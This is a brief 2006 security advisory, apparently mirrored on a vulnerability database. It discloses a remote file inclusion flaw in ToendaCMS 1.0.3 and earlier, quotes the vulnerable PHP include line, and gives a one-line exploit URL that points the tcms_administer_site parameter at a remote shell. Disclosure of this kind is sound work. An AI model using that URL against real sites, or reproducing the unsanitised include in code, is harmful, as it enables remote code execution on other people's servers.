Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13998
HistoryAug 21, 2006 - 12:00 a.m.

ToendaCMS <= 1.0.3 -(tcms_administer_site) Remote File Include

2006-08-2100:00:00
vulners.com
20

>****************************************************
> Iranians Are The Bests
>
>****************************************************
> ToendaCMS <= 1.0.3 -(tcms_administer_site) Remote File Include
>Descriptions
># Script… : ToendaCMS
># Discovered By… : You_You
># Risk : High
># Class… : Remote
># Special Thanx To All Aria-Security's Administrators
>
>

>
>Source :
> include($tcms_administer_site.'/tcms_global/database.php')
>
>
>Exploit :
> http://www.site.com/path/tcms_administer_site=SHELL